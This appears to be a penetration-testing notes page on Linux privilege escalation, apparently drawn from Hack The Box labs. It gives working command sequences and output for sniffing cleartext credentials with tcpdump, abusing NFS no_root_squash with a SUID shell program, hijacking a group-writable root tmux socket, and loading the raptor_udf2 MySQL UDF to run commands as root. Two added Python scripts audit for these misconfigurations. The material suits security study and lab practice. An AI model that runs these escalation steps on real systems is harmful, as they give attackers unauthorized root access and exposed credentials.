# Miscellaneous Techniques

## Passive Traffic Capture

If `tcpdump` is installed, unprivileged users may be able to capture network traffic, including, in some cases, credentials passed in cleartext.

```
tcpdump -i 1 -w .d.pcap -s 0 'not tcp port 22' &
```

{% embed url="<https://www.instructables.com/How-to-Find-Passwords-Using-Wireshark/>" %}

### Examine data - Tools

{% embed url="<https://github.com/DanMcInerney/net-creds>" %}
net-creds
{% endembed %}

{% embed url="<https://github.com/lgandx/PCredz>" %}
PCredz
{% endembed %}

{% embed url="<https://github.com/odedshimon/BruteShark>" %}
BruteShark
{% endembed %}

{% embed url="<https://github.com/ShellCode33/CredSLayer>" %}
CredSLayer
{% endembed %}

{% embed url="<https://www.netresec.com/?page=NetworkMiner>" %}
NetworkMiner - Free Version
{% endembed %}

{% embed url="<https://github.com/mlgualtieri/NTLMRawUnHide>" %}

## Weak NFS Privileges

{% content-ref url="/pages/fvJdpKlMKXZDihvcp2Bs" %}
[NFS (2049, 111)](/0xss0rz/pentest/protocols/nfs-2049-111.md)
{% endcontent-ref %}

```shell-session
showmount -e 10.129.2.12
```

When an NFS volume is created, various options can be set:

| Option           | Description                                                                                                                                                                                                                                                                                   |
| ---------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `root_squash`    | If the root user is used to access NFS shares, it will be changed to the `nfsnobody` user, which is an unprivileged account. Any files created and uploaded by the root user will be owned by the `nfsnobody` user, which prevents an attacker from uploading binaries with the SUID bit set. |
| `no_root_squash` | Remote users connecting to the share as the local root user will be able to create files on the NFS server as the root user. This would allow for the creation of malicious scripts/programs with the SUID bit set.                                                                           |

```shell-session
$ cat /etc/exports

# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/var/nfs/general *(rw,no_root_squash)
/tmp *(rw,no_root_squash)
```
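As an added audit example (not part of the original notes), a small Python parser for `exports(5)` lines that reports every export where root is not squashed; the sample file is constructed to mirror the listing above, and the wildcard-plus-`rw` case is the one the walkthrough below abuses.

```python
import re

# Constructed sample in exports(5) syntax, mirroring the listing above (not a real host).
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
/var/nfs/general *(rw,no_root_squash)
/tmp *(rw,no_root_squash)
/data            10.0.0.0/24(rw,root_squash,sync)
/iso             *(ro,no_root_squash)
"""

# One client token: "host", "host(opts)", "*", "10.0.0.0/24(rw)" ...
TOKEN_RE = re.compile(r"^([^(\s]+)(?:\(([^)]*)\))?$")

def parse_exports(text):
    """Yield (path, client, options) for each client of each export line.
    Strips comments and blank lines; several clients may share one line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *tokens = line.split()
        for tok in tokens:
            m = TOKEN_RE.match(tok)
            if not m:  # malformed token: surface it rather than guess
                yield path, tok, ["<unparsed>"]
                continue
            opts = [o for o in (m.group(2) or "").split(",") if o]
            yield path, m.group(1), opts

def risky_exports(text):
    """Exports where root is not squashed. exports(5) defaults are root_squash
    and ro, so only an explicit no_root_squash is flagged; rw plus a wildcard
    client lets any host write root-owned (and SUID) files on the server."""
    findings = []
    for path, client, opts in parse_exports(text):
        if "no_root_squash" not in opts:
            continue
        writable = "rw" in opts
        if writable and client == "*":
            severity = "CRITICAL"  # anyone can mount and write root-owned SUID files
        elif writable:
            severity = "HIGH"      # only the listed clients can, but they still can
        else:
            severity = "LOW"       # read-only: root identity kept, but no writes
        findings.append((path, client, severity))
    return findings
```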

Create a SETUID binary that executes `/bin/sh` as our local root user. We can then mount the `/tmp` export locally, copy the root-owned binary over to the NFS server, and set the SUID bit.

```shell-session
htb@NIX02:~$ cat shell.c 

#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>     /* setuid(), setgid() */

int main(void)
{
  /* drop to uid/gid 0 (works only because the file is root-owned SUID) and spawn a shell */
  setuid(0); setgid(0); system("/bin/bash");
  return 0;
}
```

```shell-session
gcc shell.c -o shell
```

```shell-session
root@Pwnbox:~$ sudo mount -t nfs 10.129.2.12:/tmp /mnt
root@Pwnbox:~$ cp shell /mnt
root@Pwnbox:~$ chmod u+s /mnt/shell
```

```shell-session
htb@NIX02:/tmp$ ./shell
root@NIX02:/tmp# id

uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(htb)
```

### References

{% embed url="<https://book.hacktricks.xyz/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe>" %}

{% embed url="<https://juggernaut-sec.com/nfs-no_root_squash/>" %}

### Example


```
osboxes@osboxes:~/Desktop$ sudo mount -t nfs 10.129.197.187:/tmp /mnt
osboxes@osboxes:~/Desktop$ cd /tmp
```

```shell-session
htb-student@NIX02:~$ cd /tmp
htb-student@NIX02:/tmp$ cp /bin/bash .
```


```
osboxes@osboxes:/mnt$ sudo chown root:root bash 
osboxes@osboxes:/mnt$ sudo chmod +s bash
```


```
htb-student@NIX02:/tmp$ ./bash -p
```


## Hijacking Tmux Sessions

```shell-session
$ ps aux | grep tmux

root      4806  0.0  0.1  29416  3204 ?        Ss   06:27   0:00 tmux -S /shareds new -s debugsess
```

```shell-session
$ ls -la /shareds 

srw-rw---- 1 root devs 0 Sep  1 06:27 /shareds
```

```shell-session
$ id

uid=1000(htb) gid=1000(htb) groups=1000(htb),1011(devs)
```

```shell-session
$ tmux -S /shareds

id

uid=0(root) gid=0(root) groups=0(root)
```
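Added audit example, not from the original notes: given `ps aux`, `ls -la` and `id` output like the transcript above (constructed copies here), it reports which running tmux servers' sockets the current user could connect to as someone else. It relies on Linux requiring write permission on a Unix socket file to connect(2), which is why the group `rw` on a root-owned socket matters.

```python
import re

# Constructed sample output mirroring the transcript above (not captured from a real host).
PS_AUX = [
    "root      4806  0.0  0.1  29416  3204 ?  Ss  06:27  0:00 tmux -S /shareds new -s debugsess",
    "htb       5120  0.0  0.1  29416  3100 ?  Ss  06:30  0:00 tmux new -s mine",
]
LS_LA = ["srw-rw---- 1 root devs 0 Sep  1 06:27 /shareds"]
ID_OUT = "uid=1000(htb) gid=1000(htb) groups=1000(htb),1011(devs)"

SOCKET_FLAG = re.compile(r"\btmux\b.*?\s-S\s+(\S+)")

def tmux_sockets(ps_lines):
    """Map each custom tmux socket path (-S) to the user the server runs as."""
    servers = {}
    for line in ps_lines:
        m = SOCKET_FLAG.search(line)
        if m:
            servers[m.group(1)] = line.split()[0]
    return servers

def parse_ls(line):
    """(mode, owner, group, path) from one `ls -la` line."""
    f = line.split()
    return f[0], f[2], f[3], f[-1]

def my_groups(id_output):
    """Set of group names from `id` output."""
    return set(re.findall(r"\d+\(([^)]+)\)", id_output.split("groups=")[-1]))

def attachable_sockets(ps_lines, ls_lines, id_output):
    """Sockets of other users' tmux servers this user can connect to. On Linux,
    connect(2) on a Unix socket needs the 'w' bit: group is index 5, other index 8."""
    servers = tmux_sockets(ps_lines)
    groups = my_groups(id_output)
    me = re.search(r"uid=\d+\(([^)]+)\)", id_output).group(1)
    findings = []
    for line in ls_lines:
        mode, owner, group, path = parse_ls(line)
        if path not in servers or owner == me or not mode.startswith("s"):
            continue
        if mode[8] == "w":
            who = "everyone"
        elif mode[5] == "w" and group in groups:
            who = f"group {group}"
        else:
            continue
        findings.append((path, servers[path], who))
    return findings
```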

## MySQL running as root

```
ps -ef | grep mysql
```


The MySQL service is running as root. With that, a user-defined function (UDF) compiled from `raptor_udf2.c` (Exploit-DB 1518, linked below) can be loaded into the server to run commands as root:

```shell-session
$ id
uid=500(raptor) gid=500(raptor) groups=500(raptor)
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
$ mysql -u root -p
Enter password:
[...]
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+

# 1 - id

mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
mysql> \! sh
sh-2.05b$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
[...]

# 2 - /bin/bash

mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
mysql> exit
/tmp/rootbash -p
```

{% embed url="<https://www.exploit-db.com/exploits/1518>" %}

{% embed url="<https://juggernaut-sec.com/mysql-user-defined-functions/>" %}

